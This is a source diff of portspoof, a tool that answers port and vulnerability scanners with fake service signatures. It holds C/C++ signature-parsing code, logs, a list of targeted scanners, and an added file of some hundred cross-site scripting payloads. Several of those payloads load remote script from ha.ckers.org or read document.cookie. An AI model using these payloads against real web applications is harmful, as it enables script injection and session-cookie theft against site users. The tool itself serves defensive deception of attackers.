int i;
|
||||
int j;
|
||||
int retlen;
|
||||
char* retstr;
|
||||
repeat1:
|
||||
for(i=start_offset;i<=str_end_offset;i++) // remove () from string
|
||||
{
|
||||
if(str[i]==lnaw && i!=start_offset && str[i-1]!=bslash)
|
||||
{
|
||||
j=i;
|
||||
for(j;j<str_end_offset;j++)
|
||||
{
|
||||
if(str[j]==rnaw && str[j-1]!=bslash ){
|
||||
|
||||
//fprintf(stdout,"#(%d %d)\n",i,j);
|
||||
//revregex(str,j-i,i+1,j);
|
||||
|
||||
tmplen=str_len - 2 ;
|
||||
|
||||
if (!(tmp = (char*)malloc( ( tmplen + 1) * sizeof(char)))) // alloc without the brackets
|
||||
exit(1);
|
||||
memset(tmp,0,( tmplen + 1));
|
||||
|
||||
//get rid of ()
|
||||
memcpy(tmp,str,i); // copy up to index i
|
||||
memcpy(tmp+i,str+i+1,j-i); // copy i-j
|
||||
memcpy(tmp+j-1,str+j+1,str_len-j-1);
|
||||
|
||||
//fprintf(stdout,"# offset change: %d\n", retlen-(j-i));
|
||||
free(str);
|
||||
str=tmp;
|
||||
str_len=str_len-2;
|
||||
str_end_offset=str_end_offset-2;
|
||||
goto repeat1;
|
||||
}
|
||||
|
||||
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
//fprintf(stdout,"#%s\n",str);
|
||||
|
||||
|
||||
|
||||
repeat2:
|
||||
i=start_offset;
|
||||
for(i=start_offset;i<=str_end_offset;i++)
|
||||
{
|
||||
if(str[i]==lbrak && i!=start_offset && str[i-1]!=bslash) // find left bracket
|
||||
{
|
||||
j=i;
|
||||
for(j;j<str_end_offset;j++) //find right bracket (without control char)
|
||||
{
|
||||
if(str[j]==rbrak && str[j-1]!=bslash ){
|
||||
|
||||
|
||||
//fprintf(stdout,"# [%d %c %d %c ]\n",i,str[i],j,str[j]);
|
||||
retstr=revregex_bracket(str,i,j,&retlen);
|
||||
|
||||
// merge it
|
||||
|
||||
tmplen=str_len - (j-i) + retlen;
|
||||
|
||||
if (!(tmp = (char*)malloc(tmplen)))
|
||||
exit(1);
|
||||
memset(tmp,0,tmplen);
|
||||
memcpy(tmp,str,i); // copy up to index i
|
||||
memcpy(tmp+i,retstr,retlen); // copy new string
|
||||
memcpy(tmp+i+retlen,str+j+2,str_len-j-1); // copy after index j without control
|
||||
free(str);
|
||||
str=tmp;
|
||||
str_len=tmplen;
|
||||
str_end_offset=str_end_offset+retlen - (j-i);
|
||||
goto repeat2;
|
||||
|
||||
}
|
||||
|
||||
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
*param_len=str_len;
|
||||
return str;
|
||||
}
|
||||
|
||||
int char2hex(char* ptr)
|
||||
{
|
||||
unsigned int value = 0;
|
||||
char ch = *ptr;
|
||||
int i=2;
|
||||
|
||||
while(i--) {
|
||||
if (ch >= '0' && ch <= '9')
|
||||
value = (value << 4) + (ch - '0');
|
||||
else if (ch >= 'A' && ch <= 'F')
|
||||
value = (value << 4) + (ch - 'A' + 10);
|
||||
else if (ch >= 'a' && ch <= 'f')
|
||||
value = (value << 4) + (ch - 'a' + 10);
|
||||
else
|
||||
return value;
|
||||
ch = *(++ptr);
|
||||
}
|
||||
|
||||
return value;
|
||||
|
||||
}
|
||||
|
||||
int ishex(char* ch)
|
||||
{
|
||||
|
||||
if (*ch >= '0' && *ch <= '9')
|
||||
return 1;
|
||||
else if (*ch >= 'A' && *ch <= 'F')
|
||||
return 1;
|
||||
else if (*ch >= 'a' && *ch <= 'f')
|
||||
return 1;
|
||||
else
|
||||
return 0;
|
||||
|
||||
}
|
||||
|
||||
char * escape_hex(char* str,int* final_len)
|
||||
{
|
||||
int bslash='\\';
|
||||
int i=0,i2=0;
|
||||
|
||||
int length=strlen(str);
|
||||
char *str2 = (char*)malloc(length+1);
|
||||
memset(str2,0,length+1);
|
||||
|
||||
while(*(str+i)!='\0'){
|
||||
if(*(str+i)==bslash){
|
||||
|
||||
if(*(str+i+1)!='\0' && *(str+i+1)=='0'){
|
||||
*(str2+i2)=0;
|
||||
i2++;
|
||||
i++;
|
||||
}
|
||||
else if(*(str+i+1)!='\0' && *(str+i+1)=='x' && *(str+i+2)!='\0' && ishex(str+i+2) && *(str+i+3)!='\0' && ishex(str+i+3))
|
||||
{
|
||||
//fprintf(stdout,"\\%hhx",char2hex(str+i+2));
|
||||
*(str2+i2)=(char)char2hex(str+i+2);
|
||||
i2++;
|
||||
i+=3;
|
||||
|
||||
}
|
||||
else
|
||||
{
|
||||
//fprintf(stdout,"%c",*(str+i));
|
||||
}
|
||||
}
|
||||
else{
|
||||
*(str2+i2)=*(str+i);
|
||||
i2++;
|
||||
|
||||
}
|
||||
|
||||
|
||||
i++;
|
||||
}
|
||||
|
||||
*final_len=i2;
|
||||
char* strfin;
|
||||
if (!(strfin = (char*)malloc((i2 + 1) * sizeof(char))))
|
||||
exit(1);
|
||||
|
||||
memset(strfin,0,i2+1);
|
||||
memcpy(strfin,str2,i2);
|
||||
free(str2);
|
||||
return strfin;
|
||||
|
||||
}
|
||||
|
||||
/*
|
||||
|
||||
char * clear_spaces(char* str)
|
||||
{
|
||||
|
||||
int len=0;
|
||||
int flag=1;
|
||||
int i=0;
|
||||
int j=0;
|
||||
char* str2;
|
||||
|
||||
len=strlen(str);
|
||||
if (!(str2 = malloc((len+1) * sizeof(char))))
|
||||
exit(1);
|
||||
|
||||
memset(str2,0,len+1);
|
||||
|
||||
for(i;i<len;i++)
|
||||
{
|
||||
|
||||
if(str[i]==' ' && flag==1)
|
||||
{
|
||||
str2[j]=str[i];
|
||||
j++;
|
||||
flag=0;
|
||||
}
|
||||
else if(str[i]==' ')
|
||||
flag=0;
|
||||
else
|
||||
flag=1;
|
||||
|
||||
if(flag)
|
||||
{
|
||||
str2[j]=str[i];
|
||||
j++;
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
fprintf(stdout,"size %d\n",j);
|
||||
|
||||
char* strfin;
|
||||
if (!(strfin = malloc((j + 1) * sizeof(char))))
|
||||
exit(1);
|
||||
|
||||
memset(strfin,0,j+1);
|
||||
memcpy(strfin,str2,j);
|
||||
|
||||
free(str2);
|
||||
|
||||
return strfin;
|
||||
|
||||
}
|
||||
*/
|
||||
|
||||
std::vector<char> process_signature(std::string str)
|
||||
{
|
||||
//cout<<str;
|
||||
//cout.flush();
|
||||
|
||||
size_t length = str.length();
|
||||
char *str2 =(char*) malloc(length+1);
|
||||
memset(str2,0,length+1);
|
||||
memcpy(str2,str.c_str(),length+1);
|
||||
int final_len=length;
|
||||
char *str3=revregex(str2,&final_len,0,length-1);
|
||||
char* str4=fill_specialchars(str3,&final_len,0,final_len);
|
||||
char* str5=escape_hex(str4,&final_len);
|
||||
free(str2);
|
||||
free(str3);
|
||||
free(str4);
|
||||
|
||||
/*
|
||||
fprintf(stdout,"\n##hex##\n");
|
||||
int t=0;
|
||||
for(;t<final_len;t++)
|
||||
{
|
||||
if(*(str5+t)==0)
|
||||
fprintf(stdout,"\\00");
|
||||
else if(*(str5+t)=='\n')
|
||||
fprintf(stdout,"\\n");
|
||||
else if(*(str5+t)=='\r')
|
||||
fprintf(stdout,"\\r");
|
||||
else
|
||||
fprintf(stdout,"\\%x",*(str5+t));
|
||||
}
|
||||
fprintf(stdout,"\n");
|
||||
*/
|
||||
|
||||
std::vector<char> result_vector;
|
||||
|
||||
for(int i=0; i<final_len;i++)
|
||||
result_vector.push_back(str5[i]);
|
||||
|
||||
return result_vector;
|
||||
|
||||
}
|
||||
|
||||
|
62
src/src/revregex.h
Normal file
62
src/src/revregex.h
Normal file
@ -0,0 +1,62 @@
|
||||
/*
|
||||
* portspoof Service signature obfucastor
|
||||
* Copyright (C) 12012 Piotr Duszyński <piotr[at]duszynski.eu>
|
||||
*
|
||||
* This program is free software; you can redistribute it and/or modify it
|
||||
* under the terms of the GNU General Public License as published by the
|
||||
* Free Software Foundation; either version 2 of the License, or (at your
|
||||
* option) any later version.
|
||||
*
|
||||
* This program is distributed in the hope that it will be useful,
|
||||
* but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
|
||||
* See the GNU General Public License for more details.
|
||||
*
|
||||
* You should have received a copy of the GNU General Public License along
|
||||
* with this program; if not, see <http://www.gnu.org/licenses>.
|
||||
*
|
||||
* Linking portspoof statically or dynamically with other modules is making
|
||||
* a combined work based on portspoof. Thus, the terms and conditions of
|
||||
* the GNU General Public License cover the whole combination.
|
||||
*
|
||||
* In addition, as a special exception, the copyright holder of portspoof
|
||||
* gives you permission to combine portspoof with free software programs or
|
||||
* libraries that are released under the GNU LGPL. You may copy
|
||||
* and distribute such a system following the terms of the GNU GPL for
|
||||
* portspoof and the licenses of the other code concerned.
|
||||
*
|
||||
* Note that people who make modified versions of portspoof are not obligated
|
||||
* to grant this special exception for their modified versions; it is their
|
||||
* choice whether to do so. The GNU General Public License gives permission
|
||||
* to release a modified version without this exception; this exception
|
||||
* also makes it possible to release a modified version which carries
|
||||
* forward this exception.
|
||||
*/
|
||||
|
||||
#include <stdio.h>
|
||||
#include <string.h>
|
||||
#include <stdio.h>
|
||||
#include <string.h>
|
||||
#include <string.h>
|
||||
#include <stdlib.h>
|
||||
#include <time.h>
|
||||
#include <ctype.h>
|
||||
#include <vector>
|
||||
#include <string>
|
||||
#include <iostream>
|
||||
|
||||
using namespace std;
|
||||
|
||||
#define BUFSIZE 1024
|
||||
#define SIGNATURES_SIZE 65535 // max port range
|
||||
|
||||
std::vector<char> process_signature(std::string str);
|
||||
|
||||
char * revregex_bracket(char * str,int start_offset,int end_offset, int* retlen);
|
||||
char * fill_specialchars(char * str, int* param_len, int start_offset,int end_offset);
|
||||
char* revregex(char * param_str,int* param_len,int start_offset,int end_offset);
|
||||
int char2hex(char* ptr);
|
||||
int ishex(char* ch);
|
||||
char * escape_hex(char* str,int* final_len);
|
||||
|
||||
|
65535
src/src/signatures
Normal file
65535
src/src/signatures
Normal file
File diff suppressed because it is too large
Load Diff
18240
src/src/signatures_fin
Normal file
18240
src/src/signatures_fin
Normal file
File diff suppressed because it is too large
Load Diff
65535
src/src/signatures_fin2
Normal file
65535
src/src/signatures_fin2
Normal file
File diff suppressed because it is too large
Load Diff
1
src/src/stamp-h1
Normal file
1
src/src/stamp-h1
Normal file
@ -0,0 +1 @@
|
||||
timestamp for src/config.h
|
18
src/src/target_list
Normal file
18
src/src/target_list
Normal file
@ -0,0 +1,18 @@
|
||||
|
||||
Port scanners:
|
||||
|
||||
Nmap
|
||||
Angry IP Scanner
|
||||
Superscan
|
||||
NetScanTools
|
||||
Unicornscan
|
||||
|
||||
Vuln. scanners:
|
||||
|
||||
Carrier
|
||||
Nessus
|
||||
Metasploit pro
|
||||
Acunetix
|
||||
Appscan
|
||||
Netsparker
|
||||
Grendel Scan
|
8
src/src/test.tx
Normal file
8
src/src/test.tx
Normal file
@ -0,0 +1,8 @@
|
||||
-> Verbose mode on.
|
||||
new conn - thread choosen: 9 - nr. of connections already in queue: 0
|
||||
new conn - thread choosen: 8 - nr. of connections already in queue: 0
|
||||
|
||||
---
|
||||
Thread nr.8 for port 8106
|
||||
signature sent -> \32\32\30\20\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\20\45\53\4d\54\50\20\4f\70\65\6e\53\4d\54\50\44\r\n
|
||||
---
|
8
src/src/test.txt
Normal file
8
src/src/test.txt
Normal file
@ -0,0 +1,8 @@
|
||||
-> Verbose mode on.
|
||||
new conn - thread choosen: 9 - nr. of connections already in queue: 0
|
||||
new conn - thread choosen: 8 - nr. of connections already in queue: 0
|
||||
|
||||
---
|
||||
Thread nr.8 for port 8106
|
||||
signature sent -> \32\32\30\20\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\20\45\53\4d\54\50\20\4f\70\65\6e\53\4d\54\50\44\r\n
|
||||
---
|
11
src/src/testfuzz
Normal file
11
src/src/testfuzz
Normal file
@ -0,0 +1,11 @@
|
||||
1
|
||||
2
|
||||
3
|
||||
4
|
||||
5
|
||||
6
|
||||
7
|
||||
A
|
||||
AAA
|
||||
AAAAAAAAAAAA
|
||||
AAAAAAAAAAAAAAAAAA
|
56
src/src/threads.h
Normal file
56
src/src/threads.h
Normal file
@ -0,0 +1,56 @@
|
||||
/*
|
||||
* portspoof Service signature obfucastor
|
||||
* Copyright (C) 12012 Piotr Duszyński <piotr[at]duszynski.eu>
|
||||
*
|
||||
* This program is free software; you can redistribute it and/or modify it
|
||||
* under the terms of the GNU General Public License as published by the
|
||||
* Free Software Foundation; either version 2 of the License, or (at your
|
||||
* option) any later version.
|
||||
*
|
||||
* This program is distributed in the hope that it will be useful,
|
||||
* but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
|
||||
* See the GNU General Public License for more details.
|
||||
*
|
||||
* You should have received a copy of the GNU General Public License along
|
||||
* with this program; if not, see <http://www.gnu.org/licenses>.
|
||||
*
|
||||
* Linking portspoof statically or dynamically with other modules is making
|
||||
* a combined work based on portspoof. Thus, the terms and conditions of
|
||||
* the GNU General Public License cover the whole combination.
|
||||
*
|
||||
* In addition, as a special exception, the copyright holder of portspoof
|
||||
* gives you permission to combine portspoof with free software programs or
|
||||
* libraries that are released under the GNU LGPL. You may copy
|
||||
* and distribute such a system following the terms of the GNU GPL for
|
||||
* portspoof and the licenses of the other code concerned.
|
||||
*
|
||||
* Note that people who make modified versions of portspoof are not obligated
|
||||
* to grant this special exception for their modified versions; it is their
|
||||
* choice whether to do so. The GNU General Public License gives permission
|
||||
* to release a modified version without this exception; this exception
|
||||
* also makes it possible to release a modified version which carries
|
||||
* forward this exception.
|
||||
*/
|
||||
|
||||
#include <pthread.h>
|
||||
|
||||
|
||||
extern pthread_cond_t new_connection_cond;
|
||||
extern pthread_mutex_t new_connection_mutex;
|
||||
|
||||
|
||||
|
||||
#ifndef THREAD_VARS
|
||||
#define THREAD_VARS
|
||||
|
||||
#define MAX_THREADS 10
|
||||
#define MAX_CLIENT_PER_THREAD 30
|
||||
|
||||
typedef struct {
|
||||
pthread_t tid;
|
||||
int client_count;
|
||||
int clients[MAX_CLIENT_PER_THREAD];
|
||||
} Thread;
|
||||
|
||||
#endif
|
1826
src/src/tmp
Normal file
1826
src/src/tmp
Normal file
File diff suppressed because it is too large
Load Diff
303
src/src/xss-rsnake.txt
Normal file
303
src/src/xss-rsnake.txt
Normal file
@ -0,0 +1,303 @@
|
||||
%20A
|
||||
%20AAAAAAAAAAAAAAAAAA
|
||||
<SCRIPT>alert('XSS');</SCRIPT>
|
||||
'';!--"<XSS>=&{()}
|
||||
<SCRIPT%20SRC=http://ha.ckers.org/xss.js></SCRIPT>
|
||||
<IMG%20SRC="javascript:alert('XSS');">
|
||||
<IMG%20SRC=javascript:alert('XSS')>
|
||||
<IMG%20SRC=JaVaScRiPt:alert('XSS')>
|
||||
<IMG%20SRC=javascript:alert("XSS")>
|
||||
<IMG%20SRC=`javascript:alert("RSnake%20says,%20'XSS'")`>
|
||||
<IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))>
|
||||
SRC=
<IMG%206;avascript:alert('XSS')>
|
||||
<IMG%20SRC=javascript:alert('XSS')>
|
||||
<IMG%20SRC=javascript:alert('XSS')>
|
||||
<IMG%20SRC="jav ascript:alert('XSS');">
|
||||
<IMG%20SRC="jav	ascript:alert('XSS');">
|
||||
<IMG%20SRC="jav
ascript:alert('XSS');">
|
||||
<IMG%20SRC="jav
ascript:alert('XSS');">
|
||||
<IMG%20SRC="%20%20%20javascript:alert('XSS');">
|
||||
<SCRIPT/XSS%20SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT%20SRC=http://ha.ckers.org/xss.js?<B>
|
||||
<IMG%20SRC="javascript:alert('XSS')"
|
||||
<SCRIPT>a=/XSS/
|
||||
\";alert('XSS');//
|
||||
<INPUT%20TYPE="IMAGE"%20SRC="javascript:alert('XSS');">
|
||||
<BODY%20BACKGROUND="javascript:alert('XSS')">
|
||||
<BODY%20ONLOAD=alert('XSS')>
|
||||
<IMG%20DYNSRC="javascript:alert('XSS')">
|
||||
<IMG%20LOWSRC="javascript:alert('XSS')">
|
||||
<BGSOUND%20SRC="javascript:alert('XSS');">
|
||||
<BR%20SIZE="&{alert('XSS')}">
|
||||
<LAYER%20SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
|
||||
<LINK%20REL="stylesheet"%20HREF="javascript:alert('XSS');">
|
||||
<LINK%20REL="stylesheet"%20HREF="http://ha.ckers.org/xss.css">
|
||||
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
|
||||
<META%20HTTP-EQUIV="Link"%20Content="<http://ha.ckers.org/xss.css>;%20REL=stylesheet">
|
||||
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
|
||||
<IMG%20SRC='vbscript:msgbox("XSS")'>
|
||||
<IMG%20SRC="mocha:[code]">
|
||||
<IMG%20SRC="livescript:[code]">
|
||||
<META%20HTTP-EQUIV="refresh"%20CONTENT="0;url=javascript:alert('XSS');">
|
||||
<META%20HTTP-EQUIV="refresh"%20CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
|
||||
<META%20HTTP-EQUIV="Link"%20Content="<javascript:alert('XSS')>;%20REL=stylesheet">
|
||||
<META%20HTTP-EQUIV="refresh"%20CONTENT="0;%20URL=http://;URL=javascript:alert('XSS');">
|
||||
<IFRAME%20SRC="javascript:alert('XSS');"></IFRAME>
|
||||
<FRAMESET><FRAME%20SRC="javascript:alert('XSS');"></FRAMESET>
|
||||
<TABLE%20BACKGROUND="javascript:alert('XSS')">
|
||||
<DIV%20STYLE="background-image:%20url(javascript:alert('XSS'))">
|
||||
<DIV%20STYLE="background-image:%20url(javascript:alert('XSS'))">
|
||||
<DIV%20STYLE="width:%20expression(alert('XSS'));">
|
||||
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
|
||||
<IMG%20STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
|
||||
<XSS%20STYLE="xss:expression(alert('XSS'))">
|
||||
exp/*<XSS%20STYLE='no\xss:noxss("*//*");
|
||||
<STYLE%20TYPE="text/javascript">alert('XSS');</STYLE>
|
||||
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A%20CLASS=XSS></A>
|
||||
<STYLE%20type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
|
||||
<BASE%20HREF="javascript:alert('XSS');//">
|
||||
<OBJECT%20TYPE="text/x-scriptlet"%20DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
|
||||
<OBJECT%20classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param%20name=url%20value=javascript:alert('XSS')></OBJECT>
|
||||
getURL("javascript:alert('XSS')")
|
||||
a="get";
|
||||
<!--<value><![CDATA[<XML%20ID=I><X><C><![CDATA[<IMG%20SRC="javas<![CDATA[cript:alert('XSS');">
|
||||
<XML%20SRC="http://ha.ckers.org/xsstest.xml"%20ID=I></XML>
|
||||
<HTML><BODY>
|
||||
<SCRIPT%20SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
|
||||
<!--#exec%20cmd="/bin/echo%20'<SCRIPT%20SRC'"--><!--#exec%20cmd="/bin/echo%20'=http://ha.ckers.org/xss.js></SCRIPT>'"-->
|
||||
<?%20echo('<SCR)';
|
||||
<META%20HTTP-EQUIV="Set-Cookie"%20Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
|
||||
<HEAD><META%20HTTP-EQUIV="CONTENT-TYPE"%20CONTENT="text/html;%20charset=UTF-7">%20</HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
|
||||
<SCRIPT%20a=">"%20SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT%20a=">"%20''%20SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT%20"a='>'"%20SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT%20a=`>`%20SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT>document.write("<SCRI");</SCRIPT>PT%20SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E
|
||||
<<scr\0ipt/src=http://xss.com/xss.js></script
|
||||
%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E
|
||||
'%20onmouseover=alert(/Black.Spook/)
|
||||
"><iframe%20src="http://google.com"%%203E
|
||||
'<script>window.onload=function(){document.forms[0].message.value='1';}</script>
|
||||
x”</title><img%20src%3dx%20onerror%3dalert(1)>
|
||||
<script>%20document.getElementById(%22safe123%22).setCapture();%20document.getElementById(%22safe123%22).click();%20</script>
|
||||
<script>Object.defineProperties(window,%20{Safe:%20{value:%20{get:%20function()%20{return%20document.cookie}}}});alert(Safe.get())</script>
|
||||
<script>var%20x%20=%20document.createElement('iframe');document.body.appendChild(x);var%20xhr%20=%20x.contentWindow.XMLHttpRequest();xhr.open('GET',%20'http://xssme.html5sec.org/xssme2',%20true);xhr.onload%20=%20function()%20{%20alert(xhr.responseText.match(/cookie%20=%20'(.*?)'/)[1])%20};xhr.send();</script>
|
||||
<script>(function()%20{var%20event%20=%20document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22,%20true,%20true,%20window,%200,%200,%200,%200,%200,%20false,%20false,%20false,%20false,%200,%20null);var%20fakeData%20=%20[event,%20{isTrusted:%20true},%20event];arguments.__defineGetter__('0',%20function()%20{%20return%20fakeData.pop();%20});alert(Safe.get.apply(null,%20arguments));})();</script>
|
||||
<script>var%20script%20=%20document.getElementsByTagName('script')[0];%20var%20clone%20=%20script.childNodes[0].cloneNode(true);%20var%20ta%20=%20document.createElement('textarea');%20ta.appendChild(clone);%20alert(ta.value.match(/cookie%20=%20'(.*?)'/)[1])</script>
|
||||
<script>xhr=new%20ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();</script>
|
||||
<script>alert(document.documentElement.innerHTML.match(/'([^']%2b)/)[1])</script>
|
||||
<script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[1])</script>
|
||||
<%73%63%72%69%70%74>%20%64%20=%20%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22);%20%64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65));%20%61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65%20=%20'(%2e%2a%3f)'%22)[%31]);%20</%73%63%72%69%70%74>
|
||||
<script>%20var%20xdr%20=%20new%20ActiveXObject(%22Microsoft.XMLHTTP%22);%20%20xdr.open(%22get%22,%20%22/xssme2%3Fa=1%22,%20true);%20xdr.onreadystatechange%20=%20function()%20{%20try{%20%20%20var%20c;%20%20%20if%20(c=xdr.responseText.match(/document.cookie%20=%20'(.*%3F)'/)%20)%20%20%20%20alert(c[1]);%20}catch(e){}%20};%20%20xdr.send();%20</script>
|
||||
<iframe%20id=%22ifra%22%20src=%22/%22></iframe>%20<script>ifr%20=%20document.getElementById('ifra');%20ifr.contentDocument.write(%22<scr%22%20%2b%20%22ipt>top.foo%20=%20Object.defineProperty</scr%22%20%2b%20%22ipt>%22);%20foo(window,%20'Safe',%20{value:{}});%20foo(Safe,%20'get',%20{value:function()%20{%20%20%20%20return%20document.cookie%20}});%20alert(Safe.get());</script>
|
||||
<script>alert(document.head.innerHTML.substr(146,20));</script>
|
||||
<script>alert(document.head.childNodes[3].text)</script>
|
||||
<script>var%20request%20=%20new%20XMLHttpRequest();request.open('GET',%20'http://html5sec.org/xssme2',%20false);request.send(null);if%20(request.status%20==%20200){alert(request.responseText.substr(150,41));}</script>
|
||||
<script>Object.defineProperty(window,%20'Safe',%20{value:{}});Object.defineProperty(Safe,%20'get',%20{value:function()%20{return%20document.cookie}});alert(Safe.get())</script>
|
||||
<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>r=new%20XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%22)};document.body.appendChild(x);</script>
|
||||
<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return%20top.document.cookie}});alert(parent.Safe.get())<\/script>%22)};document.body.appendChild(x);</script>
|
||||
<script>%20var+xmlHttp+=+null;%20try+{%20xmlHttp+=+new+XMLHttpRequest();%20}+catch(e)+{}%20if+(xmlHttp)+{%20xmlHttp.open('GET',+'/xssme2',+true);%20xmlHttp.onreadystatechange+=+function+()+{%20if+(xmlHttp.readyState+==+4)+{%20xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi);%20alert(RegExp.%241);%20}%20}%20xmlHttp.send(null);%20};%20</script>
|
||||
<script>%20document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());}%20document.getElementById(%22safe123%22).click({'type':'click','isTrusted':true});%20</script>
|
||||
<script>%20var+MouseEvent=function+MouseEvent(){};%20MouseEvent=MouseEvent%20var+test=new+MouseEvent();%20test.isTrusted=true;%20test.type='click';%20%20document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());}%20document.getElementById(%22safe123%22).click(test);%20</script>
|
||||
<script>%20%20(function%20(o)%20{%20%20%20function%20exploit(x)%20{%20%20%20%20if%20(x%20!==%20null)%20%20%20%20%20alert('User%20cookie%20is%20'%20%2B%20x);%20%20%20%20else%20%20%20%20%20console.log('fail');%20%20%20}%20%20%20%20%20%20o.onclick%20=%20function%20(e)%20{%20%20%20%20e.__defineGetter__('isTrusted',%20function%20()%20{%20return%20true;%20});%20%20%20%20exploit(Safe.get());%20%20%20};%20%20%20%20%20%20var%20e%20=%20document.createEvent('MouseEvent');%20%20%20e.initEvent('click',%20true,%20true);%20%20%20o.dispatchEvent(e);%20%20})(document.getElementById('safe123'));%20</script>
|
||||
<iframe%20src=/%20onload=eval(unescape(this.name.replace(/\/g,null)))%20name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522xssme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528fff.readyState%253D%253D4%2520%2526%2526%2520fff.status%253D%253D200%2529%257Balert%2528fff.responseText%2529%253B%257D%257D%253Bfff.send%2528%2529%253B></iframe>
|
||||
<script>%20%20%20%20%20function%20b()%20{%20return%20Safe.get();%20}%20alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true}));%20</script>%20
|
||||
<img%20src=http://www.google.fr/images/srpr/logo3w.png%20onload=alert(this.ownerDocument.cookie)%20width=0%20height=%200%20/>%20#
|
||||
<script>%20%20function%20foo(elem,%20doc,%20text)%20{%20%20%20elem.onclick%20=%20function%20(e)%20{%20%20%20%20e.__defineGetter__(text[0],%20function%20()%20{%20return%20true%20})%20%20%20%20alert(Safe.get());%20%20%20};%20%20%20%20%20%20var%20event%20=%20doc.createEvent(text[1]);%20%20%20event.initEvent(text[2],%20true,%20true);%20%20%20elem.dispatchEvent(event);%20%20}%20</script>%20<img%20src=http://www.google.fr/images/srpr/logo3w.png%20onload=foo(this,this.ownerDocument,this.name.split(/,/))%20name=isTrusted,MouseEvent,click%20width=0%20height=0%20/>%20#%20
|
||||
<SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{alert(Safe.get());};getElementById(%22safe123%22).click(test);</SCRIPT>#
|
||||
<script>%20var+xmlHttp+=+null;%20try+{%20xmlHttp+=+new+XMLHttpRequest();%20}+catch(e)+{}%20if+(xmlHttp)+{%20xmlHttp.open('GET',+'/xssme2',+true);%20xmlHttp.onreadystatechange+=+function+()+{%20if+(xmlHttp.readyState+==+4)+{%20xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi);%20alert(RegExp.%241);%20}%20}%20xmlHttp.send(null);%20};%20</script>#
|
||||
<video+onerror='javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());};document.getElementById(%22safe123%22).click(test);'><source>%23
|
||||
<script%20for=document%20event=onreadystatechange>getElementById('safe123').click()</script>
|
||||
<script>%20var+x+=+showModelessDialog+(this);%20alert(x.document.cookie);%20</script>
|
||||
